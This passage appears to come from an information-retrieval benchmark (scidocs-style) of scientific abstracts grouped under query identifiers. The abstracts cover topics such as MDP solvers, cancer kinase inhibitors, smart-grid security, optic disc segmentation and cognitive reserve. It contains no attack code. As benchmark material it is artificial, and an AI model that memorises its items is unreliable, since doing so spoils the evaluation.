"text": "Several researchers have shown that the efficiency of value iteration, a dynamic programming algorithm for Markov decision processes, can be improved by prioritizing the order of Bellman backups to focus computation on states where the value function can be improved the most. In previous work, a priority queue has been used to order backups. Although this incurs overhead for maintaining the priority queue, previous work has argued that the overhead is usually much less than the benefit from prioritization. However this conclusion is usually based on a comparison to a non-prioritized approach that performs Bellman backups on states in an arbitrary order. In this paper, we show that the overhead for maintaining the priority queue can be greater than the benefit, when it is compared to very simple heuristics for prioritizing backups that do not require a priority queue. Although the order of backups induced by our simple approach is often sub-optimal, we show that its smaller overhead allows it to converge faster than other state-of-the-art priority-based solvers.",
"title": ""
},
{
"docid": "2354b0d44c4ce75bee5f91c7bbbe91b0",
"text": "The central role of phosphoinositide 3-kinase (PI3K) activation in tumour cell biology has prompted a sizeable effort to target PI3K and/or downstream kinases such as AKT and mammalian target of rapamycin (mTOR) in cancer. However, emerging clinical data show limited single-agent activity of inhibitors targeting PI3K, AKT or mTOR at tolerated doses. One exception is the response to PI3Kδ inhibitors in chronic lymphocytic leukaemia, where a combination of cell-intrinsic and -extrinsic activities drive efficacy. Here, we review key challenges and opportunities for the clinical development of inhibitors targeting the PI3K–AKT–mTOR pathway. Through a greater focus on patient selection, increased understanding of immune modulation and strategic application of rational combinations, it should be possible to realize the potential of this promising class of targeted anticancer agents.",
"title": ""
},
{
"docid": "4a9ad387ad16727d9ac15ac667d2b1c3",
"text": "In recent years face recognition has received substantial attention from both research communities and the market, but still remained very challenging in real applications. A lot of face recognition algorithms, along with their modifications, have been developed during the past decades. A number of typical algorithms are presented, being categorized into appearancebased and model-based schemes. For appearance-based methods, three linear subspace analysis schemes are presented, and several non-linear manifold analysis approaches for face recognition are briefly described. The model-based approaches are introduced, including Elastic Bunch Graph matching, Active Appearance Model and 3D Morphable Model methods. A number of face databases available in the public domain and several published performance evaluation results are digested. Future research directions based on the current recognition results are pointed out.",
"title": ""
},
{
"docid": "54d08c824b7c7cbb426102b40748eccb",
"text": "Within the broad field of spoken dialogue systems, the application of machine-learning approaches to dialogue management strategy design is a rapidly growing research area. The main motivation is the hope of building systems that learn through trial-and-error interaction what constitutes a good dialogue strategy. Training of such systems could in theory be done using human users or using corpora of humancomputer dialogue, but in practice the typically vast space of possible dialogue states and strategies cannot be explored without the use of automatic user simulation tools. This requirement for training statistical dialogue models has created an interesting new application area for predictive statistical user modelling and a variety of different techniques for simulating user behaviour have been presented in the literature ranging from simple Markov Models to Bayesian Networks. The development of reliable user simulation tools is critical to further progress on automatic dialogue management design but it holds many challenges, some of which have been encountered in other areas of current research on statistical user modelling, such as the problem of “concept drift”, the problem of combining content-based and collaboration-based modelling techniques, and user model evaluation. The latter topic is of particular interest, because simulation-based learning is currently one of the few applications of statistical user modelling which employs both direct “accuracy-based” and indirect “utility-based” evaluation techniques. In this paper, we briefly summarize the role of the dialogue manager in a spoken dialogue system, give a short introduction to reinforcement-learning of dialogue management strategies and review the literature on user modelling for simulation-based strategy learning. We further describe recent work on user model evaluation and discuss some of the current research issues in simulation-based learning from a user modelling perspective. 2 J. SCHATZMANN ET AL.",
"title": ""
},
{
"docid": "8c50cf2696d6bacd5efad62a33c0514f",
"text": "Nowadays several papers have shown the ability to dump the EEPROM area of several Java Cards leading to the disclosure of already loaded applet and data structure of the card. Such a reverse engineering process is costly and prone to errors. Currently there are no tools available to help the process. We propose here an approach to find in the raw data obtained after a dump, the area containing the code and the data. Then, once the code area has been identified, we propose to rebuilt the original binary Cap file in order to be able to obtain the source code of the applet stored in the card.",
"title": ""
},
{
"docid": "c658e818d5f13ff939211d67bde4fc18",
"text": "High-throughput studies of biological systems are rapidly accumulating a wealth of 'omics'-scale data. Visualization is a key aspect of both the analysis and understanding of these data, and users now have many visualization methods and tools to choose from. The challenge is to create clear, meaningful and integrated visualizations that give biological insight, without being overwhelmed by the intrinsic complexity of the data. In this review, we discuss how visualization tools are being used to help interpret protein interaction, gene expression and metabolic profile data, and we highlight emerging new directions.",
"title": ""
},
{
"docid": "c4d16a752ccb6cd11989593604887960",
"text": "Normalizing flows and autoregressive models have been successfully combined to produce state-of-the-art results in density estimation, via Masked Autoregressive Flows (MAF) (Papamakarios et al., 2017), and to accelerate stateof-the-art WaveNet-based speech synthesis to 20x faster than real-time (Oord et al., 2017), via Inverse Autoregressive Flows (IAF) (Kingma et al., 2016). We unify and generalize these approaches, replacing the (conditionally) affine univariate transformations of MAF/IAF with a more general class of invertible univariate transformations expressed as monotonic neural networks. We demonstrate that the proposed neural autoregressive flows (NAF) are universal approximators for continuous probability distributions, and their greater expressivity allows them to better capture multimodal target distributions. Experimentally, NAF yields state-of-the-art performance on a suite of density estimation tasks and outperforms IAF in variational autoencoders trained on binarized MNIST. 1",
"title": ""
},
{
"docid": "ba8ae795796d9d5c1d33d4e5ce692a13",
"text": "This work presents a type of capacitive sensor for intraocular pressure (IOP) measurement on soft contact lens with Radio Frequency Identification (RFID) module. The flexible capacitive IOP sensor and Rx antenna was designed and fabricated using MEMS fabrication technologies that can be embedded on a soft contact lens. The IOP sensing unit is a sandwich structure composed of parylene C as the substrate and the insulating layer, gold as the top and bottom electrodes of the capacitor, and Hydroxyethylmethacrylate (HEMA) as dielectric material between top plate and bottom plate. The main sensing principle is using wireless IOP contact lenses sensor (CLS) system placed on corneal to detect the corneal deformation caused due to the variations of IOP. The variations of intraocular pressure will be transformed into capacitance change and this change will be transmitted to RFID system and recorded as continuous IOP monitoring. The measurement on in-vitro porcine eyes show the pressure reproducibility and a sensitivity of 0.02 pF/4.5 mmHg.",
"title": ""
},
{
"docid": "e9a46aa0c797520a9b192fc5607b3521",
"text": "A common setting for novelty detection assumes that labeled xamples from the nominal class are available, but that labeled examples of novelties are un available. The standard (inductive) approach is to declare novelties where the nominal density is l ow, which reduces the problem to density level set estimation. In this paper, we consider the setting where an unlabeled and possibly contaminated sample is also available at learning tim e. We argue that novelty detection in this semi-supervised setting is naturally solved by a gener al r duction to a binary classification problem. In particular, a detector with a desired false posi tive rate can be achieved through a reduction to Neyman-Pearson classification. Unlike the induc tive approach, semi-supervised novelty detection (SSND) yields detectors that are optimal (e.g., s tatistically consistent) regardless of the distribution on novelties. Therefore, in novelty detectio n, unlabeled data have a substantial impact on the theoretical properties of the decision rule. We valid ate the practical utility of SSND with an extensive experimental study. We also show that SSND provides distribution-free, learnin g-theoretic solutions to two well known problems in hypothesis testing. First, our results pr ovide a general solution to the general two-sample problem, that is, the problem of determining whe ther two random samples arise from the same distribution. Second, a specialization of SSND coi ncides with the standard p-value approach to multiple testing under the so-called random effec ts model. Unlike standard rejection regions based on thresholded p-values, the general SSND framework allows for adaptation t o arbitrary alternative distributions in multiple dimensions.",
"title": ""
},
{
"docid": "da19fd683e64b0192bd52eadfade33a2",
"text": "For professional users such as firefighters and other first responders, GNSS positioning technology (GPS, assisted GPS) can satisfy outdoor positioning requirements in many instances. However, there is still a need for high-performance deep indoor positioning for use by these same professional users. This need has already been clearly expressed by various communities of end users in the context of WearIT@Work, an R&D project funded by the European Community's Sixth Framework Program. It is known that map matching can help for indoor pedestrian navigation. In most previous research, it was assumed that detailed building plans are available. However, in many emergency / rescue scenarios, only very limited building plan information may be at hand. For example a building outline might be obtained from aerial photographs or cataster databases. Alternatively, an escape plan posted at the entrances to many building would yield only approximate exit door and stairwell locations as well as hallway and room orientation. What is not known is how much map information is really required for a USAR mission and how much each level of map detail might help to improve positioning accuracy. Obviously, the geometry of the building and the course through will be factors consider. The purpose of this paper is to show how a previously published Backtracking Particle Filter (BPF) can be combined with different levels of building plan detail to improve PDR performance. A new in/out scenario that might be typical of a reconnaissance mission during a fire in a two-story office building was evaluated. Using only external wall information, the new scenario yields positioning performance (2.56 m mean 2D error) that is greatly superior to the PDR-only, no map base case (7.74 m mean 2D error). This result has a substantial practical significance since this level of building plan detail could be quickly and easily generated in many emergency instances. The technique could be used to mitigate heading errors that result from exposing the IMU to extreme operating conditions. It is hoped that this mitigating effect will also occur for more irregular paths and in larger traversed spaces such as parking garages and warehouses.",
"title": ""
},
{
"docid": "a22ebcf11189744e7e4f15d82b1fa9d2",
"text": "Several mathematical models of epidemic cholera have recently been proposed in response to outbreaks in Zimbabwe and Haiti. These models aim to estimate the dynamics of cholera transmission and the impact of possible interventions, with a goal of providing guidance to policy makers in deciding among alternative courses of action, including vaccination, provision of clean water, and antibiotics. Here, we discuss concerns about model misspecification, parameter uncertainty, and spatial heterogeneity intrinsic to models for cholera. We argue for caution in interpreting quantitative predictions, particularly predictions of the effectiveness of interventions. We specify sensitivity analyses that would be necessary to improve confidence in model-based quantitative prediction, and suggest types of monitoring in future epidemic settings that would improve analysis and prediction.",
"title": ""
}
] | scidocsrr |
8a74a65bd68963ffff054e04748fdee2 | A Framework for Ontology Evolution in Collaborative Environments | [
{
"docid": "e72f3c598623b6d226c0aca982aecd7d",
"text": "Researchers in the ontology-design field have developed the content for ontologies in many domain areas. This distributed nature of ontology development has led to a large number of ontologies covering overlapping domains. In order for these ontologies to be reused, they first need to be merged or aligned to one another. We developed a suite of tools for managing multiple ontologies. These suite provides users with a uniform framework for comparing, aligning, and merging ontologies, maintaining versions, translating between different formalisms. Two of the tools in the suite support semi-automatic ontology merging: iPrompt is an interactive ontologymerging tool that guides the user through the merging process, presenting him with suggestions for next steps and identifying inconsistencies and potential problems. AnchorPrompt uses a graph structure of ontologies to find correlation between concepts and to provide additional information for iPrompt. 1 1 Managing Multiple Ontologies Researchers have pursued development of ontologies—explicit formal specifications of domains of discourse—on the premise that ontologies facilitate knowledge sharing and reuse (Musen, 1992; Gruber, 1993). Today, ontology development is moving from academic knowledge-representation projects to the world of e-commerce. Companies use ontologies to share information and to guide customers through their Web sites. Ontologies on the World-Wide Web range from large taxonomies categorizing Web sites (such as Yahoo!) to categorizations of products for sale and their features (such as Amazon.com). In an effort to enable machine-interpretable representation of knowledge on the Web, the WWW Consortium has developed the Resource Description Framework (W3C, 2000), a language for encoding semantic information on Web pages. The WWW consortium is also working on OWL, a more high-level language for semantic annotation on the Web.1 Such encoding makes it possible for electronic agents searching for information to share the common understanding of the semantics of the data represented on the Web. Many disciplines now develop standardized ontologies that domain experts can use to share and annotate information in their fields. Medicine, for example, has produced large, standardized, structured vocabularies such as SNOMED (Spackman, 2000) and the semantic network of the Unified Medical Language System (Lindberg et al., 1993). Broad general-purpose ontologies are emerging as well. For example, the United Nations Development Program and Dun & Bradstreet combined their efforts to develop the UNSPSC ontology which provides terminology for products and services (www.unspsc.org). With this widespread distributed use of ontologies, different parties inevitably develop ontologies http://www.w3.org/2001/sw/WebOnt/",
"title": ""
}
] | [
{
"docid": "1349c5daedd71bdfccaa0ea48b3fd54a",
"text": "OBJECTIVE\nCraniosacral therapy (CST) is an alternative treatment approach, aiming to release restrictions around the spinal cord and brain and subsequently restore body function. A previously conducted systematic review did not obtain valid scientific evidence that CST was beneficial to patients. The aim of this review was to identify and critically evaluate the available literature regarding CST and to determine the clinical benefit of CST in the treatment of patients with a variety of clinical conditions.\n\n\nMETHODS\nComputerised literature searches were performed in Embase/Medline, Medline(®) In-Process, The Cochrane library, CINAHL, and AMED from database start to April 2011. Studies were identified according to pre-defined eligibility criteria. This included studies describing observational or randomised controlled trials (RCTs) in which CST as the only treatment method was used, and studies published in the English language. The methodological quality of the trials was assessed using the Downs and Black checklist.\n\n\nRESULTS\nOnly seven studies met the inclusion criteria, of which three studies were RCTs and four were of observational study design. Positive clinical outcomes were reported for pain reduction and improvement in general well-being of patients. Methodological Downs and Black quality scores ranged from 2 to 22 points out of a theoretical maximum of 27 points, with RCTs showing the highest overall scores.\n\n\nCONCLUSION\nThis review revealed the paucity of CST research in patients with different clinical pathologies. CST assessment is feasible in RCTs and has the potential of providing valuable outcomes to further support clinical decision making. However, due to the current moderate methodological quality of the included studies, further research is needed.",
"title": ""
},
{
"docid": "1114300ff9cab6dc29e80c4d22e45e1e",
"text": "Single- and dual-feed, dual-frequency, low-profile antennas with independent tuning using varactor diodes have been demonstrated. The dual-feed planar inverted F-antenna (PIFA) has two operating frequencies which can be independently tuned from 0.7 to 1.1 GHz and from 1.7 to 2.3 GHz with better than -10 dB impedance match. The isolation between the high-band and the low-band ports is >13 dB; hence, one resonant frequency can be tuned without affecting the other. The single-feed antenna has two resonant frequencies, which can be independently tuned from 1.2 to 1.6 GHz and from 1.6 to 2.3 GHz with better than -10 dB impedance match for most of the tuning range. The tuning is done using varactor diodes with a capacitance range from 0.8 to 3.8 pF, which is compatible with RF MEMS devices. The antenna volumes are 63 × 100 × 3.15 mm3 on er = 3.55 substrates and the measured antenna efficiencies vary between 25% and 50% over the tuning range. The application areas are in carrier aggregation systems for fourth generation (4G) wireless systems.",
"title": ""
},
{
"docid": "8b11c5c6b134576d8ce7ce3484e17822",
"text": "The popularity and complexity of online social networks (OSNs) continues to grow unabatedly with the most popular applications featuring hundreds of millions of active users. Ranging from social communities and discussion groups, to recommendation engines, tagging systems, mobile social networks, games, and virtual worlds, OSN applications have not only shifted the focus of application developers to the human factor, but have also transformed traditional application paradigms such as the way users communicate and navigate in the Internet. Indeed, understanding user behavior is now an integral part of online services and applications, with system and algorithm design becoming in effect user-centric. As expected, this paradigm shift has not left the research community unaffected, triggering intense research interest in the analysis of the structure and properties of online communities.",
"title": ""
},
{
"docid": "e6a60fab31af5985520cc64b93b5deb0",
"text": "BACKGROUND\nGenital warts may mimic a variety of conditions, thus complicating their diagnosis and treatment. The recognition of early flat lesions presents a diagnostic challenge.\n\n\nOBJECTIVE\nWe sought to describe the dermatoscopic features of genital warts, unveiling the possibility of their diagnosis by dermatoscopy.\n\n\nMETHODS\nDermatoscopic patterns of 61 genital warts from 48 consecutively enrolled male patients were identified with their frequencies being used as main outcome measures.\n\n\nRESULTS\nThe lesions were examined dermatoscopically and further classified according to their dermatoscopic pattern. The most frequent finding was an unspecific pattern, which was found in 15/61 (24.6%) lesions; a fingerlike pattern was observed in 7 (11.5%), a mosaic pattern in 6 (9.8%), and a knoblike pattern in 3 (4.9%) cases. In almost half of the lesions, pattern combinations were seen, of which a fingerlike/knoblike pattern was the most common, observed in 11/61 (18.0%) cases. Among the vascular features, glomerular, hairpin/dotted, and glomerular/dotted vessels were the most frequent finding seen in 22 (36.0%), 15 (24.6%), and 10 (16.4%) of the 61 cases, respectively. In 10 (16.4%) lesions no vessels were detected. Hairpin vessels were more often seen in fingerlike (χ(2) = 39.31, P = .000) and glomerular/dotted vessels in knoblike/mosaic (χ(2) = 9.97, P = .008) pattern zones; vessels were frequently missing in unspecified (χ(2) = 8.54, P = .014) areas.\n\n\nLIMITATIONS\nOnly male patients were examined.\n\n\nCONCLUSIONS\nThere is a correlation between dermatoscopic patterns and vascular features reflecting the life stages of genital warts; dermatoscopy may be useful in the diagnosis of early-stage lesions.",
"title": ""
},
{
"docid": "4ba941ee9e7840dc18cf873062076456",
"text": "We document methods for the quantitative evaluation of systems that produce a scalar summary of a biometric sample's quality. We are motivated by a need to test claims that quality measures are predictive of matching performance. We regard a quality measurement algorithm as a black box that converts an input sample to an output scalar. We evaluate it by quantifying the association between those values and observed matching results. We advance detection error trade-off and error versus reject characteristics as metrics for the comparative evaluation of sample quality measurement algorithms. We proceed this with a definition of sample quality, a description of the operational use of quality measures. We emphasize the performance goal by including a procedure for annotating the samples of a reference corpus with quality values derived from empirical recognition scores",
"title": ""
},
{
"docid": "5d1182695ad44e581fb58d1521339274",
"text": "This paper presents a new configuration for linear MOS voltage-to-current conversion (transconductance). The proposed circuit combines two previously reported linearization methods [1], [2]. The topology achieves 60-dB linearity for a fully balanced input dynamic range up to 1 at a 3.3-V supply voltage, with slightly decreasing performance in the unbalanced case. The linearity is preserved during the tuning process for a moderate range of transconductance values. The approach is validated by both computer simulations and experiments.",
"title": ""
},
{
"docid": "e5f2a33ef8952e1b8c5129e8aa65045c",
"text": "This paper addresses the problem of learning similarity-preserving binary codes for efficient similarity search in large-scale image collections. We formulate this problem in terms of finding a rotation of zero-centered data so as to minimize the quantization error of mapping this data to the vertices of a zero-centered binary hypercube, and propose a simple and efficient alternating minimization algorithm to accomplish this task. This algorithm, dubbed iterative quantization (ITQ), has connections to multiclass spectral clustering and to the orthogonal Procrustes problem, and it can be used both with unsupervised data embeddings such as PCA and supervised embeddings such as canonical correlation analysis (CCA). The resulting binary codes significantly outperform several other state-of-the-art methods. We also show that further performance improvements can result from transforming the data with a nonlinear kernel mapping prior to PCA or CCA. Finally, we demonstrate an application of ITQ to learning binary attributes or \"classemes\" on the ImageNet data set.",
"title": ""
},
{
"docid": "276e3670984416d145b426f78c529ed8",
"text": "State estimators in power systems are currently used to, for example, detect faulty equipment and to route power flows. It is believed that state estimators will also play an increasingly important role in future smart power grids, as a tool to optimally and more dynamically route power flows. Therefore security of the estimator becomes an important issue. The estimators are currently located in control centers, and large numbers of measurements are sent over unencrypted communication channels to the centers. We here study stealthy false-data attacks against these estimators. We define a security measure tailored to quantify how hard attacks are to perform, and describe an efficient algorithm to compute it. Since there are so many measurement devices in these systems, it is not reasonable to assume that all devices can be made encrypted overnight in the future. Therefore we propose two algorithms to place encrypted devices in the system such as to maximize their utility in terms of increased system security. We illustrate the effectiveness of our algorithms on two IEEE benchmark power networks under two attack and protection cost models.",
"title": ""
},
{
"docid": "d622cf283f27a32b2846a304c0359c5f",
"text": "Reliable verification of image quality of retinal screening images is a prerequisite for the development of automatic screening systems for diabetic retinopathy. A system is presented that can automatically determine whether the quality of a retinal screening image is sufficient for automatic analysis. The system is based on the assumption that an image of sufficient quality should contain particular image structures according to a certain pre-defined distribution. We cluster filterbank response vectors to obtain a compact representation of the image structures found within an image. Using this compact representation together with raw histograms of the R, G, and B color planes, a statistical classifier is trained to distinguish normal from low quality images. The presented system does not require any previous segmentation of the image in contrast with previous work. The system was evaluated on a large, representative set of 1000 images obtained in a screening program. The proposed method, using different feature sets and classifiers, was compared with the ratings of a second human observer. The best system, based on a Support Vector Machine, has performance close to optimal with an area under the ROC curve of 0.9968.",
"title": ""
},
{
"docid": "688fde854293b0902911d967c5e0a906",
"text": "As Internet users increasingly rely on social media sites like Facebook and Twitter to receive news, they are faced with a bewildering number of news media choices. For example, thousands of Facebook pages today are registered and categorized as some form of news media outlets. Inferring the bias (or slant) of these media pages poses a difficult challenge for media watchdog organizations that traditionally rely on con-",
"title": ""
},
{
"docid": "e2d0a4d2c2c38722d9e9493cf506fc1c",
"text": "This paper describes two Global Positioning System (GPS) based attitude determination algorithms which contain steps of integer ambiguity resolution and attitude computation. The first algorithm extends the ambiguity function method to account for the unique requirement of attitude determination. The second algorithm explores the artificial neural network approach to find the attitude. A test platform is set up for verifying these algorithms.",
"title": ""
},
{
"docid": "5da453a1e40f1781804045f64462ea8e",
"text": "Severe aphasia, adult left hemispherectomy, Gilles de la Tourette syndrome (GTS), and other neurological disorders have in common an increased use of swearwords. There are shared linguistic features in common across these language behaviors, as well as important differences. We explore the nature of swearing in normal human communication, and then compare the clinical presentations of selectively preserved, impaired and augmented swearing. These neurolinguistic observations, considered along with related neuroanatomical and neurochemical information, provide the basis for considering the neurobiological foundation of various types of swearing behaviors.",
"title": ""
},
{
"docid": "1d0f73a465399421b86bc6cf470d70dc",
"text": "INTRODUCTION\nThis study was initiated to determine the psychometric properties of the Smart Phone Addiction Scale (SAS) by translating and validating this scale into the Malay language (SAS-M), which is the main language spoken in Malaysia. This study can distinguish smart phone and internet addiction among multi-ethnic Malaysian medical students. In addition, the reliability and validity of the SAS was also demonstrated.\n\n\nMATERIALS AND METHODS\nA total of 228 participants were selected between August 2014 and September 2014 to complete a set of questionnaires, including the SAS and the modified Kimberly Young Internet addiction test (IAT) in the Malay language.\n\n\nRESULTS\nThere were 99 males and 129 females with ages ranging from 19 to 22 years old (21.7±1.1) included in this study. Descriptive and factor analyses, intra-class coefficients, t-tests and correlation analyses were conducted to verify the reliability and validity of the SAS. Bartlett's test of sphericity was significant (p <0.01), and the Kaiser-Mayer-Olkin measure of sampling adequacy for the SAS-M was 0.92, indicating meritoriously that the factor analysis was appropriate. The internal consistency and concurrent validity of the SAS-M were verified (Cronbach's alpha = 0.94). All of the subscales of the SAS-M, except for positive anticipation, were significantly related to the Malay version of the IAT.\n\n\nCONCLUSIONS\nThis study developed the first smart phone addiction scale among medical students. This scale was shown to be reliable and valid in the Malay language.",
"title": ""
},
{
"docid": "20fd36e287a631c82aa8527e6a36931f",
"text": "Creating a mesh is the first step in a wide range of applications, including scientific computing and computer graphics. An unstructured simplex mesh requires a choice of meshpoints (vertex nodes) and a triangulation. We want to offer a short and simple MATLAB code, described in more detail than usual, so the reader can experiment (and add to the code) knowing the underlying principles. We find the node locations by solving for equilibrium in a truss structure (using piecewise linear force-displacement relations) and we reset the topology by the Delaunay algorithm. The geometry is described implicitly by its distance function. In addition to being much shorter and simpler than other meshing techniques, our algorithm typically produces meshes of very high quality. We discuss ways to improve the robustness and the performance, but our aim here is simplicity. Readers can download (and edit) the codes from http://math.mit.edu/~persson/mesh.",
"title": ""
},
{
"docid": "2be8a11750dcce1f412f386ae3834c7c",
"text": "Cloud-based file synchronization services, such as Dropbox, have never been more popular. They provide excellent reliability and durability in their server-side storage, and can provide a consistent view of their synchronized files across multiple clients. However, the loose coupling of these services and the local file system may, in some cases, turn these benefits into drawbacks. In this paper, we show that these services can silently propagate both local data corruption and the results of inconsistent crash recovery, and cannot guarantee that the data they store reflects the actual state of the disk. We propose techniques to prevent and recover from these problems by reducing the separation between local file systems and synchronization clients, providing clients with deeper knowledge of file system activity and allowing the file system to take advantage of the correct data stored remotely.",
"title": ""
},
{
"docid": "c37e48459d24f7802bfb863c731ecff4",
"text": "The need to evaluate a function f (A) ∈ C n×n of a matrix A ∈ C n×n arises in a wide and growing number of applications, ranging from the numerical solution of differential equations to measures of the complexity of networks. We give a survey of numerical methods for evaluating matrix functions, along with a brief treatment of the underlying theory and a description of two recent applications. The survey is organized by classes of methods, which are broadly those based on similarity transformations, those employing approximation by polynomial or rational functions, and matrix iterations. Computation of the Fréchet derivative, which is important for condition number estimation, is also treated, along with the problem of computing f (A)b without computing f (A). A summary of available software completes the survey.",
"title": ""
},
{
"docid": "94f8ebb84705e0d6c7a87bb6515fd710",
"text": "We describe here our approaches and results on the WAT 2017 shared translation tasks. Motivated by the good results we obtained with Neural Machine Translation in the previous shared task, we continued to explore this approach this year, with incremental improvements in models and training methods. We focused on the ASPEC dataset and could improve the stateof-the-art results for Chinese-to-Japanese and Japanese-to-Chinese translations.",
"title": ""
},
{
"docid": "13ec9ea20812dd75b4947b395ef1a595",
"text": "Cameras are a natural fit for micro aerial vehicles (MAVs) due to their low weight, low power consumption, and two-dimensional field of view. However, computationally-intensive algorithms are required to infer the 3D structure of the environment from 2D image data. This requirement is made more difficult with the MAV’s limited payload which only allows for one CPU board. Hence, we have to design efficient algorithms for state estimation, mapping, planning, and exploration. We implement a set of algorithms on two different vision-based MAV systems such that these algorithms enable the MAVs to map and explore unknown environments. By using both self-built and off-the-shelf systems, we show that our algorithms can be used on different platforms. All algorithms necessary for autonomous mapping and exploration run on-board the MAV. Using a front-looking stereo camera as the main sensor, we maintain a tiled octree-based 3D occupancy map. The MAV uses this map for local navigation and frontier-based exploration. In addition, we use a wall-following algorithm as an alternative exploration algorithm in open areas where frontier-based exploration underperforms. During the exploration, data is transmitted to the ground station which runs ∗http://people.inf.ethz.ch/hengli large-scale visual SLAM. We estimate the MAV’s state with inertial data from an IMU together with metric velocity measurements from a custom-built optical flow sensor and pose estimates from visual odometry. We verify our approaches with experimental results, which to the best of our knowledge, demonstrate our MAVs to be the first vision-based MAVs to autonomously explore both indoor and outdoor environments.",
"title": ""
},
{
"docid": "ffd7afcf6e3b836733b80ed681e2a2b9",
"text": "The emergence of cloud management systems, and the adoption of elastic cloud services enable dynamic adjustment of cloud hosted resources and provisioning. In order to effectively provision for dynamic workloads presented on cloud platforms, an accurate forecast of the load on the cloud resources is required. In this paper, we investigate various forecasting methods presented in recent research, identify and adapt evaluation metrics used in literature and compare forecasting methods on prediction performance. We investigate the performance gain of ensemble models when combining three of the best performing models into one model. We find that our 30th order Auto-regression model and Feed-Forward Neural Network method perform the best when evaluated on Google's Cluster dataset and using the provision specific metrics identified. We also show an improvement in forecasting accuracy when evaluating two ensemble models.",
"title": ""
},
{
"docid": "7d3b8f381710cb196ba126f2b1942d57",
"text": "Radar devices can be used in nonintrusive situations to monitor vital sign, through clothes or behind walls. By detecting and extracting body motion linked to physiological activity, accurate simultaneous estimations of both heart rate (HR) and respiration rate (RR) is possible. However, most research to date has focused on front monitoring of superficial motion of the chest. In this paper, body penetration of electromagnetic (EM) wave is investigated to perform back monitoring of human subjects. Using body-coupled antennas and an ultra-wideband (UWB) pulsed radar, in-body monitoring of lungs and heart motion was achieved. An optimised location of measurement in the back of a subject is presented, to enhance signal-to-noise ratio and limit attenuation of reflected radar signals. Phase-based detection techniques are then investigated for back measurements of vital sign, in conjunction with frequency estimation methods that reduce the impact of parasite signals. Finally, an algorithm combining these techniques is presented to allow robust and real-time estimation of both HR and RR. Static and dynamic tests were conducted, and demonstrated the possibility of using this sensor in future health monitoring systems, especially in the form of a smart car seat for driver monitoring.",
"title": ""
}
] | scidocsrr |
2182711b3dabc3f3d810d48f3a45690d | Sudden Deaths : Taking Stock of Geographic Ties | [
{
"docid": "15886d83be78940609c697b30eb73b13",
"text": "Why is corruption—the misuse of public office for private gain— perceived to be more widespread in some countries than others? Different theories associate this with particular historical and cultural traditions, levels of economic development, political institutions, and government policies. This article analyzes several indexes of “perceived corruption” compiled from business risk surveys for the 1980s and 1990s. Six arguments find support. Countries with Protestant traditions, histories of British rule, more developed economies, and (probably) higher imports were less \"corrupt\". Federal states were more \"corrupt\". While the current degree of democracy was not significant, long exposure to democracy predicted lower corruption.",
"title": ""
}
] | [
{
"docid": "e20fd63eac8226c829efefdea5680228",
"text": "Optic disc segmentation in retinal fundus images plays a critical rule in diagnosing a variety of pathologies and abnormalities related to eye retina. Most of the abnormalities that are related to optic disc lead to structural changes in the inner and outer zones of optic disc. Optic disc segmentation on the level of whole retina image degrades the detection sensitivity for these zones. In this paper, we present an automated technique for the Region-Of-Interest segmentation of optic disc region in retinal images. Our segmentation technique reduces the processing area required for optic disc segmentation techniques leading to notable performance enhancement and reducing the amount of the required computational cost for each retinal image. DRIVE, DRISHTI-GS and DiaRetDB1 datasets were used to test and validate our proposed pre-processing technique.",
"title": ""
},
{
"docid": "002aec0b09bbd2d0e3453c9b3aa8d547",
"text": "It is often appealing to assume that existing solutions can be directly applied to emerging engineering domains. Unfortunately, careful investigation of the unique challenges presented by new domains exposes its idiosyncrasies, thus often requiring new approaches and solutions. In this paper, we argue that the “smart” grid, replacing its incredibly successful and reliable predecessor, poses a series of new security challenges, among others, that require novel approaches to the field of cyber security. We will call this new field cyber-physical security. The tight coupling between information and communication technologies and physical systems introduces new security concerns, requiring a rethinking of the commonly used objectives and methods. Existing security approaches are either inapplicable, not viable, insufficiently scalable, incompatible, or simply inadequate to address the challenges posed by highly complex environments such as the smart grid. A concerted effort by the entire industry, the research community, and the policy makers is required to achieve the vision of a secure smart grid infrastructure.",
"title": ""
},
{
"docid": "ff04301675ffa651e9cbdfbb9c6ab75d",
"text": "It is challenging to detect and track the ball from the broadcast soccer video. The feature-based tracking methods to judge if a sole object is a target are inadequate because the features of the balls change fast over frames and we cannot differ the ball from other objects by them. This paper proposes a new framework to find the ball position by creating and analyzing the trajectory. The ball trajectory is obtained from the candidate collection by use of the heuristic false candidate reduction, the Kalman filterbased trajectory mining, and the trajectory evaluation. The ball trajectory is extended via a localized Kalman filter-based model matching procedure. The experimental results on two consecutive 1000-frame sequences illustrate that the proposed framework is very effective and can obtain a very high accuracy that is much better than existing methods.",
"title": ""
},
{
"docid": "9faec965b145160ee7f74b80a6c2d291",
"text": "Several skin substitutes are available that can be used in the management of hand burns; some are intended as temporary covers to expedite healing of shallow burns and others are intended to be used in the surgical management of deep burns. An understanding of skin biology and the relative benefits of each product are needed to determine the optimal role of these products in hand burn management.",
"title": ""
},
{
"docid": "346cd0b680f7da2ff8ab3d97a294086c",
"text": "Inference in Conditional Random Fields and Hidden Markov Models is done using the Viterbi algorithm, an efficient dynamic programming algorithm. In many cases, general (non-local and non-sequential) constraints may exist over the output sequence, but cannot be incorporated and exploited in a natural way by this inference procedure. This paper proposes a novel inference procedure based on integer linear programming (ILP) and extends CRF models to naturally and efficiently support general constraint structures. For sequential constraints, this procedure reduces to simple linear programming as the inference process. Experimental evidence is supplied in the context of an important NLP problem, semantic role labeling.",
"title": ""
},
{
"docid": "15fc6cbc3a5103e8ef51449b0f987b46",
"text": "BACKGROUND\nCognitive reserve (CR) or brain reserve capacity explains why individuals with higher IQ, education, or occupational attainment have lower risks of developing dementia, Alzheimer's disease (AD) or vascular dementia (VaD). The CR hypothesis postulates that CR reduces the prevalence and incidence of AD or VaD. It also hypothesizes that among those who have greater initial cognitive reserve (in contrast to those with less reserve) greater brain pathology occurs before the clinical symptoms of disease becomes manifest. Thus clinical disease onset triggers a faster decline in cognition and function, and increased mortality among those with initial greater cognitive reserve. Disease progression follows distinctly separate pathological and clinical paths. With education as a proxy we use meta-analyses and qualitative analyses to review the evidence for the CR hypothesis.\n\n\nMETHODOLOGY/PRINCIPAL FINDINGS\nWe searched PubMed, PsycoINFO, EMBASE, HealthStar, and Scopus databases from January 1980 to June 2011 for observational studies with clear criteria for dementia, AD or VaD and education. One hundred and thirty-three articles with a variety of study designs met the inclusion criteria. Prevalence and incidence studies with odds ratios (ORs), relative risks or original data were included in the meta-analyses. Other studies were reviewed qualitatively. The studies covered 437,477 subjects. Prevalence and incidence studies with pooled ORs of 2.61 (95%CI 2.21-3.07) and 1.88 (95%CI 1.51-2.34) respectively, showed low 